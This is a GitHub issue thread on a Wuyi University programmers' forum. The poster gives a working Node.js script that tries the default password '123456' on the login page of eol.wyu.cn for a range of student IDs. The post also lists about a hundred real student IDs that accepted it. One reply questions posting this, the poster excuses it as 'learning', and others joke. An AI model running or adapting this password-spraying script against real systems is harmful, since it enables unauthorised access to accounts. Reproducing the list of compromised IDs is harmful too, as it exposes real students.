search

WuyiUniversity / forum

五邑大学程序员专用论坛
https://github.com/WuyiUniversity/forum/issues
12 stars 1 forks source link

编写Nodejs脚本 枚举eol.wyu.cn上密码是123456的账号 #12

Open fritx opened 10 years ago

fritx commented 10 years ago

以11级计算机学院学生为例,命令行下的输出:

fritx@js ~/work/test $ node eol-hack
Yep caught: 11080109
Yep caught: 11080115
Yep caught: 11080117
Yep caught: 11080128
Yep caught: 11080134
Yep caught: 11080138
Yep caught: 11080139
Yep caught: 11080145
Yep caught: 11080146
Yep caught: 11080152
Yep caught: 11080212
Yep caught: 11080213
Yep caught: 11080214
Yep caught: 11080216
Yep caught: 11080220
Yep caught: 11080225
Yep caught: 11080229
Yep caught: 11080234
Yep caught: 11080241
Yep caught: 11080243
Yep caught: 11080249
Yep caught: 11080254
Yep caught: 11080301
Yep caught: 11080304
Yep caught: 11080315
Yep caught: 11080316
Yep caught: 11080317
Yep caught: 11080318
Yep caught: 11080324
Yep caught: 11080329
Yep caught: 11080330
Yep caught: 11080332
Yep caught: 11080333
Yep caught: 11080338
Yep caught: 11080339
Yep caught: 11080347
Yep caught: 11080401
Yep caught: 11080407
Yep caught: 11080413
Yep caught: 11080419
Yep caught: 11080422
Yep caught: 11080424
Yep caught: 11080426
Yep caught: 11080428
Yep caught: 11080429
Yep caught: 11080432
Yep caught: 11080439
Yep caught: 11080447
Yep caught: 11080502
Yep caught: 11080510
Yep caught: 11080511
Yep caught: 11080512
Yep caught: 11080516
Yep caught: 11080529
Yep caught: 11080530
Yep caught: 11080532
Yep caught: 11080535
Yep caught: 11080540
Yep caught: 11080546
Yep caught: 11080602
Yep caught: 11080610
Yep caught: 11080611
Yep caught: 11080616
Yep caught: 11080619
Yep caught: 11080620
Yep caught: 11080622
Yep caught: 11080623
Yep caught: 11080627
Yep caught: 11080632
Yep caught: 11080634
Yep caught: 11080705
Yep caught: 11080707
Yep caught: 11080708
Yep caught: 11080711
Yep caught: 11080714
Yep caught: 11080715
Yep caught: 11080721
Yep caught: 11080722
Yep caught: 11080728
Yep caught: 11080738
Yep caught: 11080742
Yep caught: 11080744
Yep caught: 11080745
Yep caught: 11080746
Yep caught: 11080747
Yep caught: 11080752
Yep caught: 11080803
Yep caught: 11080818
Yep caught: 11080821
Yep caught: 11080832
Yep caught: 11080834
Yep caught: 11080836
Yep caught: 11080838
Yep caught: 11080843
Yep caught: 11080844
Yep caught: 11080846
Yep caught: 11080848
Yep caught: 11080850
Done!

Nodejs源码:

// eol-hack.js

var request = require('request')

var PASS = '123456'

var firstId = '11080101'
var lastId = '11080860'

var done = function() {
  console.log('Done!')
  process.exit()
}

var next = function(id) {
  if (id >= lastId) return null
  // 如果学号不是纯数字的话
  //var arr = id.match(/^(\D*)(\d+)$/)
  //var head = arr[1]
  //var num = +arr[2]
  var head = '', num = +id
  if (num % 100 < 60) {
    num = num + 1
  } else {
    // 超出60就切换到下一个班级
    num = (~~(num / 100) + 1) * 100 + 1
  }
  return head + num
}

var send = function(id, pass, cb) {
  request.post({
    url: 'http://eol.wyu.cn/eol/homepage/common/login.jsp',
    form: {
      IPT_LOGINUSERNAME: id,
      IPT_LOGINPASSWORD: pass
    },
    headers: {
      // 对于一些其他的网站,headers还得加上,尤其是referer
      //'Host': 'eol.wyu.cn',
      //'Origin': 'http://eol.wyu.cn',
      //'Referer': 'http://eol.wyu.cn/eol/homepage/common/',
      //'User-Agent':'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'
    }
  }, cb)
}

var receive = function(id, html) {
  var caught = html.trim().match(/history\.back/)
  if (caught) {
    console.log('Yep caught: ' + id)
  }
}

var hack = function(id, pass, cb) {
  send(id, pass, function(err, res, html){
    receive(id, html)
    cb()
  })
}

var startHack = function(id) {
  hack(id, PASS, function(){
    var nextId = next(id)
    if (!nextId) done()
    startHack(nextId)
  })
}

/////////////

startHack(firstId)
ade951 commented 10 years ago

你这样给人贴出来不太好吧?

fritx commented 10 years ago

@ade951 是的 公然贴出 做法欠佳 不过考虑到123456是默认密码 仅为“学习交流之便” 且可加强展示效果 于是决定全部贴出

Jayin commented 10 years ago

拍拍!同学,你有快递,请开门查收!

VectorWen commented 10 years ago

儿,不错哦。